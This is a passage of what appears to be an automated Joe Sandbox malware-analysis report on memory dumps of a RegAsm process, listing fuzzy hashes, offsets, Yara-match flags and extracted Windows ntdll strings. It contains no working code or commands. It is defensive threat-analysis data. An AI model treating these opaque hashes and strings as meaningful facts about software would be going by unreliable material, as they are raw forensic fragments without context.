                                                                                                                          • Instruction Fuzzy Hash: 2E710371A083419FD714DF20C990A2BBBE6FF84798F90491DFAA697240C7B1D805CF92
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1574816777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: VUUU$gfff$x]
                                                                                                                          • API String ID: 0-3997559273
                                                                                                                          • Opcode ID: 9a6c975f1886d1fe4b96bfb870e21dcc57498c8a0634e48bc1bfed244c764e45
                                                                                                                          • Instruction ID: d3a2f6509b41c9d411cdec590559353a7d1a0e8a07c23da48f5048874aa254b3
                                                                                                                          • Opcode Fuzzy Hash: 9a6c975f1886d1fe4b96bfb870e21dcc57498c8a0634e48bc1bfed244c764e45
                                                                                                                          • Instruction Fuzzy Hash: 035149B2B0011647DB2C892ECE5866AB256E7E4314F58813BDD06EF7D0EA7CED1187C4
                                                                                                                          Strings
                                                                                                                          • TargetNtPath, xrefs: 02FBB82F
                                                                                                                          • GlobalizationUserSettings, xrefs: 02FBB834
                                                                                                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 02FBB82A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                          • API String ID: 0-505981995
                                                                                                                          • Opcode ID: 9fe4c7cf662fd9dfc2a7239c310f19d79f64a218db728ccf094cecc83809848f
                                                                                                                          • Instruction ID: 384ca481f1829abb83070058edc254253956155ebb9f341406b4ae4bafae4de8
                                                                                                                          • Opcode Fuzzy Hash: 9fe4c7cf662fd9dfc2a7239c310f19d79f64a218db728ccf094cecc83809848f
                                                                                                                          • Instruction Fuzzy Hash: E4619572D4122D9BDB32DF55CC98BDAB7B9AF08758F4101E5EA09A7250C7749E80CF90
                                                                                                                          Strings
                                                                                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 02F3E6C6
                                                                                                                          • HEAP: , xrefs: 02F3E6B3
                                                                                                                          • HEAP[%wZ]: , xrefs: 02F3E6A6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                          • API String ID: 0-1340214556
                                                                                                                          • Opcode ID: ae9cc0293aa704966d9e9d9401110f1cc0bedc9e297a94a5d341e4f3c20d1709
                                                                                                                          • Instruction ID: 31e123a5a47fc8dffbc6af6fe905bb30d7eac9930882fe0d3fd19d80219ebbd6
                                                                                                                          • Opcode Fuzzy Hash: ae9cc0293aa704966d9e9d9401110f1cc0bedc9e297a94a5d341e4f3c20d1709
                                                                                                                          • Instruction Fuzzy Hash: B5511735680684EFE722DBA8C944FAABBF9FF05344F1490A4E642CB692D774E901CF11
                                                                                                                          Strings
                                                                                                                          • HEAP: , xrefs: 02F8DC1F
                                                                                                                          • HEAP[%wZ]: , xrefs: 02F8DC12
                                                                                                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 02F8DC32
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                          • API String ID: 0-3815128232
                                                                                                                          • Opcode ID: 0127f810efecd9f5e95dad938197ba6411fbe072b5608d212fc128db4e0b3d83
                                                                                                                          • Instruction ID: 2a98d1381b883da652d234a2e2570f79f1b5a7659b40ceb923a897a4db227583
                                                                                                                          • Opcode Fuzzy Hash: 0127f810efecd9f5e95dad938197ba6411fbe072b5608d212fc128db4e0b3d83
                                                                                                                          • Instruction Fuzzy Hash: 625114366401548AE768EE3AC845772F3E2EF452D8F14889EE6C2CB6C1D375D843DB61
                                                                                                                          Strings
                                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 02F582DE
                                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 02F582D7
                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 02F582E8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 0-1783798831
                                                                                                                          • Opcode ID: 52e42c1d9c3409f4afb9608cd87d34380dd9c8b1a4188e3d8c7301282101f2b0
                                                                                                                          • Instruction ID: fe5329e0d2974d95280d6b4eca1a500399319608723b3913cfcb57b1c626b88f
                                                                                                                          • Opcode Fuzzy Hash: 52e42c1d9c3409f4afb9608cd87d34380dd9c8b1a4188e3d8c7301282101f2b0
                                                                                                                          • Instruction Fuzzy Hash: 2941C271A85318ABD720EB74EC44B5BB7EAAF447D0F44492ABB45D7290E7B0D810CF92
                                                                                                                          Strings
                                                                                                                          • LdrpAllocateTls, xrefs: 02F51B40
                                                                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 02F51B4A
                                                                                                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 02F51B39
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                          • API String ID: 0-4274184382
                                                                                                                          • Opcode ID: 27f7ae75a0f6c1712852ad837e54bda2c6d56eec4fbdb4048d2319e51bbadc14
                                                                                                                          • Instruction ID: ec0869419b096bac88c8502d902af4260cb7fac302415214c0aeea8d781c86d6
                                                                                                                          • Opcode Fuzzy Hash: 27f7ae75a0f6c1712852ad837e54bda2c6d56eec4fbdb4048d2319e51bbadc14
                                                                                                                          • Instruction Fuzzy Hash: 4B418C75E41609AFDB15DFA8C840BAEB7B6FF48784F548519E60AA7200E774A800CF60
                                                                                                                          Strings
                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 02F9C1C5
                                                                                                                          • @, xrefs: 02F9C1F1
                                                                                                                          • PreferredUILanguages, xrefs: 02F9C212
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                          • API String ID: 0-2968386058
                                                                                                                          • Opcode ID: 3da6df81ee2a839d94dce54190c53300d74cab8df8eba00eb2abdfc5da52fd05
                                                                                                                          • Instruction ID: 9d493d08bfe921b297b64fe6039cb414937629e7a610f22eaf2653e34c5ffe46
                                                                                                                          • Opcode Fuzzy Hash: 3da6df81ee2a839d94dce54190c53300d74cab8df8eba00eb2abdfc5da52fd05
                                                                                                                          • Instruction Fuzzy Hash: B1417272E00219ABEF11DBD4C891BEEB7B9AB09B44F10406BE705B7280D7749A44CB50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                          • API String ID: 0-1373925480
                                                                                                                          • Opcode ID: 4791d9c72c9cdb05e5cf1ba1f673b8563f9f88b7649ae388268666172dbbde7c
                                                                                                                          • Instruction ID: 0091153a6faeecfb1af99dff29a51a10767f94886ff417bb67b23267f9dae459
                                                                                                                          • Opcode Fuzzy Hash: 4791d9c72c9cdb05e5cf1ba1f673b8563f9f88b7649ae388268666172dbbde7c
                                                                                                                          • Instruction Fuzzy Hash: 60411432E006888FEB22DBD4C840BADB7B9EF55384F14045AEA01FB791D7748901CF10
                                                                                                                          Strings
                                                                                                                          • LdrpCheckRedirection, xrefs: 02F6488F
                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 02F64899
                                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 02F64888
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                          • API String ID: 0-3154609507
                                                                                                                          • Opcode ID: 5aeeea9b1da04d320a99649ec8c6758b1608136c5f2cbeb8cad5de9503dc7a7c
                                                                                                                          • Instruction ID: 72d17a8348be17a4d659ac9291cfe71afc3b2b2124d056cad5e5996ebe04a8b4
                                                                                                                          • Opcode Fuzzy Hash: 5aeeea9b1da04d320a99649ec8c6758b1608136c5f2cbeb8cad5de9503dc7a7c
                                                                                                                          • Instruction Fuzzy Hash: 3C41D132F052988FCB31EE78D948E36B7E5EF8A6D4B050659EE49D7211D730D810CB91
                                                                                                                          Strings
                                                                                                                          • RtlCreateActivationContext, xrefs: 02F529F9
                                                                                                                          • SXS: %s() passed the empty activation context data, xrefs: 02F529FE
                                                                                                                          • Actx , xrefs: 02F133AC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                          • API String ID: 0-859632880
                                                                                                                          • Opcode ID: 44a99476d53b66a8ba51874bdcecf8912c2ec0d12d265b6184e0123e231cb8af
                                                                                                                          • Instruction ID: 62ee6bc2d1bfce2883c516ffda8ac29027720a371ce09c993e7fc7c092fd14a2
                                                                                                                          • Opcode Fuzzy Hash: 44a99476d53b66a8ba51874bdcecf8912c2ec0d12d265b6184e0123e231cb8af
                                                                                                                          • Instruction Fuzzy Hash: C4316432A403119FEB26CE68D891FA677A5EB48794F5584A9FF05DF285CB30E841CB90
                                                                                                                          Strings
                                                                                                                          • DLL "%wZ" has TLS information at %p, xrefs: 02F51A40
                                                                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 02F51A51
                                                                                                                          • LdrpInitializeTls, xrefs: 02F51A47
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                          • API String ID: 0-931879808
                                                                                                                          • Opcode ID: 156e33be12a348a94cd1bfe646dca0b921b3d5010636a259b6165fecec2c3de3
                                                                                                                          • Instruction ID: 45ea83ddc355b8767376bfb0656162d0503e8d7574c3ac85777ea1a14053a097
                                                                                                                          • Opcode Fuzzy Hash: 156e33be12a348a94cd1bfe646dca0b921b3d5010636a259b6165fecec2c3de3
                                                                                                                          • Instruction Fuzzy Hash: 4A310A32E40204ABE7149B68CC85F6BB77AFB507D5F944559F709A7180D770AD00CFA0
                                                                                                                          Strings
                                                                                                                          • BuildLabEx, xrefs: 02F2130F
                                                                                                                          • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 02F2127B
                                                                                                                          • @, xrefs: 02F212A5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                          • API String ID: 0-3051831665
                                                                                                                          • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                          • Instruction ID: bd5fa90c582f99b873f64690a3af3b9b0562d67baee0d063da0f8e193d790e10
                                                                                                                          • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                          • Instruction Fuzzy Hash: 87317072900529ABDF119BA5CD44EAFBBBAEB85794F004025EB14A71A0D7309E09CFA4
                                                                                                                          Strings
                                                                                                                          • LdrpInitializationFailure, xrefs: 02F620FA
                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 02F62104
                                                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 02F620F3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                          • API String ID: 0-2986994758
                                                                                                                          • Opcode ID: 837f0aab1e6da4b8e7e061c71027809b70d7a7c3eac0842f699b7c7013e5a875
                                                                                                                          • Instruction ID: ed020298fb7410ef69a42c566eef828043b15301558152adf851fb6a501eb820
                                                                                                                          • Opcode Fuzzy Hash: 837f0aab1e6da4b8e7e061c71027809b70d7a7c3eac0842f699b7c7013e5a875
                                                                                                                          • Instruction Fuzzy Hash: 11F02871A8031C6BF714D658CD0AFAA7769EB40B84F500058FF00B7281D2F0A511CE41
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ___swprintf_l
                                                                                                                          • String ID: #%u
                                                                                                                          • API String ID: 48624451-232158463
                                                                                                                          • Opcode ID: eb1b7cb741a214954c910eb704b6444701318d0175780f2912516d0f7b193523
                                                                                                                          • Instruction ID: 05243ba6a2370ad6db852fc769d021a3e6f5b59ebe9f42528758999cc3beec77
                                                                                                                          • Opcode Fuzzy Hash: eb1b7cb741a214954c910eb704b6444701318d0175780f2912516d0f7b193523
                                                                                                                          • Instruction Fuzzy Hash: 99714B72A0014A9FDB01DFA8C994FAEBBB9FF08744F154065EA05E7251EB74EE41CB60
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @$@
                                                                                                                          • API String ID: 0-149943524
                                                                                                                          • Opcode ID: 9a960ddad67ee3b4ec422008b1d0c713cb74f8a18639c71c88dd3edab9f6156b
                                                                                                                          • Instruction ID: 1024be1c3b97eb665d4e76ed2a42032358f118b7d06c64614ef11a72fee1a3cd
                                                                                                                          • Opcode Fuzzy Hash: 9a960ddad67ee3b4ec422008b1d0c713cb74f8a18639c71c88dd3edab9f6156b
                                                                                                                          • Instruction Fuzzy Hash: 5E320F705483518BCB64CF18C480B7EBBF5EF95748F95992EFA968B290E770C840CB92
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `$`
                                                                                                                          • API String ID: 0-197956300
                                                                                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                          • Instruction ID: c945f1bd63645f2bd1f07e0148ea39a62b24022a1c665ffc3079c52571774f90
                                                                                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                          • Instruction Fuzzy Hash: 2AC1E1B16043469FD725CF28C860B6BBBF6AF84398F084A2CFA95CA290D775D509CF41
                                                                                                                          Strings
                                                                                                                          • ResIdCount less than 2., xrefs: 02F3EEC9
                                                                                                                          • Failed to retrieve service checksum., xrefs: 02F3EE56
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                                          • API String ID: 0-863616075
                                                                                                                          • Opcode ID: 0971359f56f50e7e7be25ced54876c874d1f6b23e9ab58a30ece61f6d435a33e
                                                                                                                          • Instruction ID: 9aa4de9b15f187f86f1226a130c65fbaee770315d76fcb05dbe35a2aead44338
                                                                                                                          • Opcode Fuzzy Hash: 0971359f56f50e7e7be25ced54876c874d1f6b23e9ab58a30ece61f6d435a33e
                                                                                                                          • Instruction Fuzzy Hash: B8E1F1B19483849FE724CF25C440BAFBBE1BF88354F008A2EE6999B380D7719549CF56
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID: Legacy$UEFI
                                                                                                                          • API String ID: 2994545307-634100481
                                                                                                                          • Opcode ID: cf1c431120c5a3da7d7f20366965a974961702802e15f34e78d6b51e3c446b3a
                                                                                                                          • Instruction ID: cdd70eb8c32ece4291648485ab080ea57319d663a1ddf309b6bd507cd7ace552
                                                                                                                          • Opcode Fuzzy Hash: cf1c431120c5a3da7d7f20366965a974961702802e15f34e78d6b51e3c446b3a
                                                                                                                          • Instruction Fuzzy Hash: 2A617E72E402289FDB14DFA8C940FAEBBB5FB44785F10406DEB59EB241D735AA00CB50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $$$
                                                                                                                          • API String ID: 0-233714265
                                                                                                                          • Opcode ID: 87e3d572e60f26f204ce36ef6747f88c107bd596138e299ff9087bf708dde8eb
                                                                                                                          • Instruction ID: 58eb605b45ba8cebca76071478ee848dee5363df6c1cd31be3dfca4f918a50d1
                                                                                                                          • Opcode Fuzzy Hash: 87e3d572e60f26f204ce36ef6747f88c107bd596138e299ff9087bf708dde8eb
                                                                                                                          • Instruction Fuzzy Hash: 7761BC71E80789DFDB60DFA4C580BADB7B2FF44708F149469E615ABA80CB74A941CB90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1574816777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: VUUU$x]
                                                                                                                          • API String ID: 0-1081218327
                                                                                                                          • Opcode ID: 8eed5e3fa5678906523be94dbcbbfd873b20ecbf657f218711688ae4cf3c7fe6
                                                                                                                          • Instruction ID: 84d6148941cb8ce5c6bb85f960f9bcab2daab6e23e86e6bb376cdaf2f0ad1cc3
                                                                                                                          • Opcode Fuzzy Hash: 8eed5e3fa5678906523be94dbcbbfd873b20ecbf657f218711688ae4cf3c7fe6
                                                                                                                          • Instruction Fuzzy Hash: E04159B1B0010647DB2C891DCE586BAB656F7E4314F68823BDD06AF7D0E9BCAE518784
                                                                                                                          Strings
                                                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 02EEA2FB
                                                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 02EEA309
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                          • API String ID: 0-2876891731
                                                                                                                          • Opcode ID: 26f30b027c3603271e34a18fc56cd068a2adcda77d5e9565210f0f8c8de091dc
                                                                                                                          • Instruction ID: 4b12bc201334f88dad5f9d6f61f4aad6d0764cce48f316338339c054803a7394
                                                                                                                          • Opcode Fuzzy Hash: 26f30b027c3603271e34a18fc56cd068a2adcda77d5e9565210f0f8c8de091dc
                                                                                                                          • Instruction Fuzzy Hash: 3641A931A40649CBCB21CF69C840BAEBBB4EF85348F2480B9E916DB391E775D900CB50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: .Local\$@
                                                                                                                          • API String ID: 0-380025441
                                                                                                                          • Opcode ID: bce659dfb142e27f517f00be652cf26f568abc9ae307a14f2ddb2a7284abc0b4
                                                                                                                          • Instruction ID: 2af193e2bcb160e43f1bdc411a406740708931ff564a8abc0d4899953924e29d
                                                                                                                          • Opcode Fuzzy Hash: bce659dfb142e27f517f00be652cf26f568abc9ae307a14f2ddb2a7284abc0b4
                                                                                                                          • Instruction Fuzzy Hash: 763181726483459FC711DF28C880A6BBBE8EBC5794F80096EFA9583250DB31DD04CF96
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: MUI
                                                                                                                          • API String ID: 0-1339004836
                                                                                                                          • Opcode ID: 62417d484eff725bdfc0be57d689d3bf88ccbf35aeaeea9c87cc07d5117bae13
                                                                                                                          • Instruction ID: c6dd328303afd60dabe8739cc18af3e0f37b7a9a96a15cad95fbd9df8047e9c8
                                                                                                                          • Opcode Fuzzy Hash: 62417d484eff725bdfc0be57d689d3bf88ccbf35aeaeea9c87cc07d5117bae13
                                                                                                                          • Instruction Fuzzy Hash: C5823B75E402588BDF24CFA9C980BEDB7B5BF48318F24E16AE85AAB350D7309941CF50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: P`vRbv
                                                                                                                          • API String ID: 0-2392986850
                                                                                                                          • Opcode ID: 56e78426eea7d34811c0f0e28c8c4a77878dd5b35f9b73c65f8ccc477fc80071
                                                                                                                          • Instruction ID: d990ee82bb53669ff75afaa3b12de4ec23756c5555eb0f1451e24badc0686efd
                                                                                                                          • Opcode Fuzzy Hash: 56e78426eea7d34811c0f0e28c8c4a77878dd5b35f9b73c65f8ccc477fc80071
                                                                                                                          • Instruction Fuzzy Hash: 1842CA72D0425AAEDF2ADF68D8447FDBBB1EF05394F14809AEB41A7290D7748981CBD0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e31d74e864e590d20319aa660c289415bdc85447f7b4721faa86d29627cfef5f
                                                                                                                          • Instruction ID: 5d550faecf24bb1aeacca2b718574f0cd456b2bb65536e36960478c26734cf11
                                                                                                                          • Opcode Fuzzy Hash: e31d74e864e590d20319aa660c289415bdc85447f7b4721faa86d29627cfef5f
                                                                                                                          • Instruction Fuzzy Hash: C0A12871A48342CFC720DF28D480A6AFBE6BF88744F14996DE68697350E770E945CF92
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0
                                                                                                                          • API String ID: 0-4108050209
                                                                                                                          • Opcode ID: 4eeee9f31e2243d7390b989aa95f61743e780e857ce98f64db7f2c2fa51e8ab5
                                                                                                                          • Instruction ID: 5499de5ee015e4917aa15b5943733e662f6639a01d55d13d02c15bd47240885f
                                                                                                                          • Opcode Fuzzy Hash: 4eeee9f31e2243d7390b989aa95f61743e780e857ce98f64db7f2c2fa51e8ab5
                                                                                                                          • Instruction Fuzzy Hash: 54F1A171E08741CFDB25CF24C4C0B6ABBE1AF88794F0448ADEA9997380DB34D945EB52
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
